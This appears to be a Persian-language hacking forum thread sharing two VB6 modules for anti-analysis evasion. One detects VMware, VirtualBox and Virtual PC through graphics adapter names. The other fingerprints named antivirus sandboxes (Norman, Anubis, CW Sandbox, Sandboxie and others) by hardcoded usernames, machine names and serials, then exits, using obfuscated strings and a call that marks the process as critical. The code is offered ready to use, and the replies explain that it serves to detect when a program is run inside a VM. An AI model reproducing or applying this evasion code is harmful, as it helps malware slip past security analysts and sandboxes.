امتیاز موضوع:
  • 36 رای - 2.81 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Anti Vm, Sandboxie, Norman
نویسنده پیام
Amin_Mansouri آفلاین
مدیر کل سایت
*

ارسال‌ها: 4,842
تاریخ عضویت: Apr 2011
اعتبار: 158
.وضعیت من: Artistic
ارسال: #1
Anti Vm, Sandboxie, Norman
کد:
Option Explicit

Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hObject As Long)
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long

Private Const TH32CS_SNAPPROCESS = &H2
Private Const MAX_PATH As Long = 260

Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type

Function vm()
Dim oAdapters As Object
Dim oCard As Object
Dim SQL As String' Abfrage erstellen
SQL = "SELECT * FROM Win32_VideoController"
Set oAdapters = GetObject("winmgmts:").ExecQuery(SQL)


' Auflisten aller Grafikadapter
For Each oCard In oAdapters
Select Case oCard.Description

Case "VM Additions S3 Trio32/64"
MsgBox "MS VPC with Additions found!", vbInformation

Case "S3 Trio32/64"
MsgBox "MS VPC without Additions found!", vbInformation

Case "VirtualBox Graphics Adapter"
MsgBox "VirtualBox with Additions found!", vbInformation


Case "VMware SVGA II"
MsgBox "VMWare with Additions found!", vbInformation

Case ""
MsgBox "VM found!", vbInformation

Case Else
MsgBox "I'm not running in a VM!", vbInformation
End SelectNext
End FunctionPublic Function Sandboxed() As Boolean
Dim nSnapshot As Long, nProcess As PROCESSENTRY32
Dim nResult As Long, ParentID As Long, IDCheck As Boolean
Dim nProcessID As Long

'Eigene ProcessID ermitteln
nProcessID = GetCurrentProcessId
If nProcessID <> 0 Then
'Abbild der Prozesse machen
nSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
If nSnapshot <> 0 Then
nProcess.dwSize = Len(nProcess)

'Zeiger auf ersten Prozess bewegen
nResult = ProcessFirst(nSnapshot, nProcess)

Do Until nResult = 0
'Nach der eigenen ProcessID suchen.
If nProcess.th32ProcessID = nProcessID Then

'Wir merken uns die ParentProcessID
ParentID = nProcess.th32ParentProcessID

'Wir beginnen nochmal beim ersten Prozess
nResult = ProcessFirst(nSnapshot, nProcess)
Do Until nResult = 0
'Wir suchen den Process mit der ParentID
If nProcess.th32ProcessID = ParentID Then
'Falls so ein Prozess vorhanden ist, dann ist das Programm nicht sandboxed
IDCheck = False
Exit Do
Else
IDCheck = True
nResult = ProcessNext(nSnapshot, nProcess)
End If
Loop

'Falls check True ist, dann ist das Programm Sandboxed
Sandboxed = IDCheck

Exit Do
Else
'Zum nächsten Prozess
nResult = ProcessNext(nSnapshot, nProcess)
End If
Loop
' Handle wird geschloßen
CloseHandle nSnapshot
End If
End If
End Function


Reply With Quote.

--------------------------------------------------------------------------------
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
08-30-2011، 11:28 AM
وب‌سایت ارسال‌ها پاسخ
Oep آفلاین
RinG UnderZer0
*

ارسال‌ها: 160
تاریخ عضویت: Jun 2011
اعتبار: 17
.وضعیت من: هیچکدام
ارسال: #2
RE: Anti Vm, Sandboxie, Norman
فکرنکنم بچه های اینجا کاری به کار SandBox و... داشته باشن.شایدم نمیخان اطلاعاتشون رو به اشتراک بزارنSmile
کد:
'TANX SqUeEzEr
Option Explicit
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function RtlAdjustPrivilege Lib "ntdll" (ByVal Privilege As Long, ByVal Enable As Boolean, ByVal Client As Boolean, WasEnabled As Long) As Long
Private Declare Function NtSetInformationProcess Lib "ntdll.dll" (ByVal hProcess As Integer, ByVal ProcessInformationClass As Integer, ByVal ProcessInformation As Long, ByVal ProcessInformationLength As Integer) As Integer
Private Declare Function GetVolumeInformationA Lib "kernel32" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Long, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long
Private Declare Sub ExitProcess Lib "kernel32" (ByVal uExitCode As Long)

Public Sub CompCheck()
    Dim bFound As Boolean
    
    If GWser = "55274-339-6006333-22900" Then
        bFound = True
    End If
    
    If GWser = "76487-OEM-0065901-82986" Then
        bFound = True
    End If
    
    If Environ("computername") = "XPSP3" Then
        If Environ("username") = "Joe" Then
            bFound = True
        End If
    End If
    
    If Left(Environ("computername"), 10) = "NONE-DUSEZ" Then
        bFound = True
    End If
    
    If Left(Environ("computername"), 5) = "VMLOG" Then
        bFound = True
    End If
    
    If Environ("username") = "Sndbx" Then
        If GetDriveSerial() = 546811503 Then bFound = True 'Sandbox of unknown AV
    End If
    
    If Environ("username") = "tester" Then
        If GetDriveSerial() = 800539777 Then bFound = True 'Sandbox of unknown AV found...
    End If
    
    If Environ("USERNAME") = "panda" Then
        If Environ("computername") = "AUTO" Then bFound = True 'Msgbox "Panda Sandbox Detected"
    End If
        
    If Environ("username") = "currentuser" Then bFound = True 'MsgBox "Norman Sandbox Detected"
    
    If App.Path = "C:\" Then
        If App.EXEName = "file" Then bFound = True 'MsgBox "Sunbelt Sandbox Detected"
        If App.EXEName = "Sample" Then bFound = True 'MsgBox "Anubis Sandbox Detected"
    End If
        
    If GetModuleHandle("SbieDll.dll") Then bFound = True 'MsgBox "Sandboxie Detected"

    If Environ("username") = "Schmidti" Then bFound = True 'MsgBox "CW Sandbox Detected"
        
    If bFound = True Then
        Call MakeCritical(-1, True)
        Call ExitProcess(0)
    End If

End Sub
Private Function MakeCritical(Phandle As Long, Value As Boolean)
    Dim ProcessInfo As Long
    ProcessInfo = IIf(Value, 29&, 0&)
    Call RtlAdjustPrivilege(20, True, True, 0)
    Call NtSetInformationProcess(Phandle, 29, VarPtr(ProcessInfo), Len(ProcessInfo))
End Function
Private Function GetDriveSerial() As Long
    Dim RetVal As Long
    Dim str As String * 255
    Dim str2 As String * 255
    Dim a As Long
    Dim b As Long
    Call GetVolumeInformationA("C:\", str, 255, RetVal, a, b, str2, 255)
    GetDriveSerial = IIf(RetVal < 0, RetVal * -1, RetVal)
End Function
Public Function GWser() As String 'Get windows serial
  Dim WinSerial As String
  Dim SWbemSet As Object
  Dim SWbemObj As Object
  On Error Resume Next
    Set SWbemSet = GetObject(What("xjonhnut;|jnqfstpobujpoMfwfm>jnqfstpobuf~")).InstancesOf(Split(What("Xjo43`PqfsbujohTztufn-TfsjbmOvncfs"), ",")(0))
    WinSerial = ""
    For Each SWbemObj In SWbemSet
      WinSerial = SWbemObj.Properties_(Split(What("Xjo43`PqfsbujohTztufn-TfsjbmOvncfs"), ",")(1)) 'Property value
      WinSerial = Trim(WinSerial)
      If Len(WinSerial) < 1 Then WinSerial = "Unknown"
    GWser = WinSerial
  Next
End Function
Public Function What(huh) As String
Dim god As Long
Dim current As Long
Dim Process As String
For god = 1 To Len(huh)
            current = Asc(Mid(huh, god, 1)) - 1
        Process = Process & Chr(current)
    Next god
    What = Process
End Function

معبودا مرا ببخش، بخاطر درهایی که کوبیدم ولی هیچکدام خانه تو نبود ...
08-30-2011، 11:59 AM
ارسال‌ها پاسخ
one hacker alone آفلاین
کاربر تازه وارد
*

ارسال‌ها: 42
تاریخ عضویت: Apr 2012
اعتبار: 2
.وضعیت من: Adored
ارسال: #3
RE: Anti Vm, Sandboxie, Norman
توضیحاتی در این باره بدین خوشحال میشیم
01-11-2013، 08:00 AM
ارسال‌ها پاسخ
Amin_Mansouri آفلاین
مدیر کل سایت
*

ارسال‌ها: 4,842
تاریخ عضویت: Apr 2011
اعتبار: 158
.وضعیت من: Artistic
ارسال: #4
RE: Anti Vm, Sandboxie, Norman
وقتی برنامتو توی ماشین مجازی یا همان vm باز کنند.

میتونی با کدهای بالا تشخیص بدی
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
01-11-2013، 09:25 AM
وب‌سایت ارسال‌ها پاسخ


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  [VB6]Anti Debug 4 ways Amin_Mansouri 3 4,014 01-12-2013، 04:22 PM
آخرین ارسال: one hacker alone
  VB6 - Anti CW Sandbox & Anubis Module Amin_Mansouri 0 2,861 10-20-2011، 05:19 PM
آخرین ارسال: Amin_Mansouri
  ANTI-DEBUGGERS Protection Amin_Mansouri 0 3,163 04-17-2011، 03:23 PM
آخرین ارسال: Amin_Mansouri
  Anti Debug Amin_Mansouri 0 2,994 04-17-2011، 02:51 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان

تماس با ما | ParsiCoders (Persian Team) For Programming ,Security,Cracking,Network,Pars Civilization,Medical,Science,Entertaining | بازگشت به بالا | | حالت آرشیو | پیوند سایتی RSS
This forum uses Lukasz Tkacz MyBB addons.